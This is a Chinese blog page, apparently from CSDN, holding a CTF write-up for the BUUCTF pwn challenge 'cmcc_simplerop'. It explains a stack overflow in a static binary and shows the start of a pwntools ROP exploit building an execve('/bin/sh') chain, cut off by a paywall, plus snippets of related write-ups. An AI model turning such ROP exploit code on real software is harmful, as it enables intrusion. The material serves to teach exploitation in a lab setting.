CMCC--simplerop 题解

最新推荐文章于 2024-03-27 01:37:28 发布
最新推荐文章于 2024-03-27 01:37:28 发布
阅读量1.5k 收藏 7
点赞数 7
分类专栏: pwn ctf 网络安全 文章标签: pwn 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A951860555/article/details/115286266
版权

Write Up

文件信息

  该样本是我在做BUUCTF上的题刷到的,该题目本身漏洞明显,利用起来也不算太难,不过在我查阅一下他人的wp后发现了多种解法,在这里做个记录和总结。样本链接:simplerop
  老规矩先来检查一下文件的信息,32位小端程序,且只开启了NX保护。
checksec

漏洞定位

程序本身采用的是静态链接,所以用IDA进行分析的时候会发现.text段中的函数特别多,当然这本身也是为了配合题目给出的提示方便我们利用这么多的gadgets构造ROP链。
file
然后我们在IDA中定位到main函数,可以发现程序十分简单,read函数造成了栈溢出,而且提示到位使用ROP进行漏洞利用。
main

利用分析

由于漏洞比较明显,没有后门函数可以利用,且并没有暴露出system函数,加上题目的提示,所以这里采用构造ROP链的方式进行攻击。构造ROP链进行攻击时,可以采取泄露出libc地址,ret2libc的方式,这里我并没有使用这种方式,而是使用了其它三种方法,有兴趣的读者可以再试试ret2libc的方法。

wp

第一种方法:
  ROP链实现execve系统调用,这里我们可以借助ROPgadget工具自动生成ropchain,命令行如下:ROPgadget --binary simplerop --ropchain,不过该方法生成的ropchain太长,read函数有限制无法全部读取,所以需要对生成的ropchain链进行改造。具体wp如下:

from pwn import *

io = process("./simplerop")
# remote环境可以在BUUCTF上找到
# io = remote("node3.buuoj.cn", 27111)

from struct import pack

# Padding goes here
p = cyclic(0x14+0x4+0x8)     # 动态调试得到,IDA显示的不对
p += pack(b'<I', 0x0806e82a) # pop edx ; ret
p += pack(b'<I', 0x080ea060) # @ .data
p += pack(b'<I', 0x080bae06) # pop eax ; ret
p += b'/bin'
p &#
最低0.47元/天 解锁文章
__lifanxin
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
专栏目录
cmcc Simplerop
Morphy_Amo的博客
03-17 3927
rop
cmcc_simplerop
m0sway的博客
11-29 410
cmcc_simplerop 使用checksec查看: 嗯,只开了栈不可执行,题目已经提示是漏洞是栈溢出了。 直接放进IDA中查看: 很简洁,直接在主函数中给出了栈溢出的地方。 接着查看了该程序的字符串,发现这是一个静态编译的程序,而且不存在flag、/bin/sh等关键字符串。 看来是不能直接getshell。但是可以发现存在int 80,这么一来,可以执行系统调用了。 接下来就是我们需要找一些通用的可以给寄存器赋值的命令。 so…因为系统调用,需要我们执行这样的命令:int80(11,"/bi
BUUCTF----cmcc_simplerop
qq_33010875的博客
09-28 359
环境:WSL2,ubuntu16.04,python2 常规checksec文件: ida反编译: 明显看到read函数会导致栈溢出 gdb调试程序: 用cyclic指令生成100个数字,运行程序: 求输入点到返回地址的偏移: 得到偏移是32,即0x20 值得一提的是,在ida中,我们可以看到偏移是0x18+0x04=0x1c,以gdb调试为准 原因可参考: https://blog.csdn.net/mcmuyanga/article/details/109260008 文件名给了提示,使用
Ropgadget中ropchain的详细分析
最新发布
流水不争先,争的是滔滔不绝
03-27 1280
通常情况下,由于程序的输入长度有限制,而ROPgadget生成的ropchain过长,导致ropchain无法适用,如果能够针对ropchain进行简单的修改的话,那便能减少构建rop链花费的心思。
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 448
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
BUUCTF-PWN-cmcc_simplerop
qq_41743240的博客
04-28 473
BUUCTF-cmcc_simplerop 开了NX IDA反编译 程序非常简单,漏洞也一眼可见 程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode exploit: #coding:utf-8 from pwn import * #p=process('simplerop') p=remote('node3.b...
cmcc--simplerop
03-28
cmcc pwn题样本,可以使用多种rop方式进行漏洞利用,打开自己的思路,wp链接: https://blog.csdn.net/A951860555/article/details/115286266
cmcc-stp.Msi
11-05
cmcc-stp.Msi
cmcc-stp-patch
11-05
cmcc-stp-patch
cmcc-auto设置xp
07-15
解决cmcc-auto不能使用xp连接的问题,不用下载cmcc-auto的证书的。
cmcc-stp.msi
09-25
cmcc-stp.msi
CMCC登录软件最新版
01-24
CMCC登录软件最新版本,一次设置好,下次只需要打开软件,登录上就可以上网了,最新版本的,可用于CMCCCMCC EDU
[BUUCTF]PWN——CmmC_Simplerop
mcmuyanga的博客
11-07 243
cmcc_simplerop 附件 步骤 例行检查,32位,开启了nx保护 本地试运行一下程序,查看一下大概的情况 32位ida载入,习惯性的检索程序里的字符串,看了个寂寞,从main函数开始看程序 参数v4明显的溢出漏洞 对于这种开启了nx保护没有可以利用函数的题,我一般都是利用ret2libc的方法,但是这道题,我查plt表里,居然没有之前调用过的函数的地址, 在参考了其他师傅的wp之后知道了这题是利用的ret2syscall,binsh可以直接写入bss段,这位师傅还在程序里发现了mprote
HITCON-trainning&寒假做题记录
Peanuts
01-28 651
HITCON-trainning 2019.1.27 是一些好题目这几天准备重新做一遍预计两天之内完成现在做到lab7 题目地址:https://github.com/scwuaptx/HITCON-Training lab1 比较简单的逆向题这里就不贴代码了,就是一个疑惑解码 lab2 一个普通的int0x80的一个shellcode编写这里就不多讲了感觉没有什么 lab3 ret2sc 原理比...
cmcc simplerop
pondzhang的专栏
05-25 217
from pwn import * p = process('./simplerop') p.recv() int80_addr = 0x080493e1 pop_eax = 0x080bae06 read = 0x0806CD50 binsh = 0x080EB584 pop_edx_ecx_ebx = 0x0806e850 payload = 'a'*0x20 + p32(read) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh) + p32(0x8) payl
BUUCTF cmcc_simplerop
BengDouLove的博客
04-14 891
这道题打开ida又是那么一大堆一大堆的函数,也没有外部引用的段,所以就是静态链接把好多函数都链接进来了 所以就和 BUU上另一道 inndy_rop 一样,直接用ROPgadget 去找rop链 from struct import pack # Padding goes here p = '' p += pack('<I', 0x0806e82a) # pop edx ...
Pwn-10月24-hitcon(二)
weixin_30553837的博客
10-24 162
目录 Pwn-10月24-hitcon(二) lab4 - ret2lib 检查保护措施 逻辑分析 构造exp lab5-simplerop 检查保护措施 逻辑分析 构造exp ...
File "D:\python\pythonProject\MY_GUI.py", line 3 import CMCC-XG3H ^ SyntaxError: invalid syntax
07-15
这个错误消息表明在文件 "D:\python\pythonProject\MY_GUI.py" 的第3行存在语法错误,导致解释器无法正确解析代码。根据错误消息中的 "^" 符号指示,错误发生在 "import CMCC-XG3H" 这一行。 在Python中,模块名不能包含特殊字符,如 "-",因此这里的 "CMCC-XG3H" 是一个无效的模块名。你可以尝试将模块名修改为有效的名称,例如 "CMCC_XG3H" 或者 "CMCCXG3H"。 修改后的代码应该类似于: ```python import CMCC_XG3H ``` 请确保你的代码中没有其他语法错误,以免引发更多的错误。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值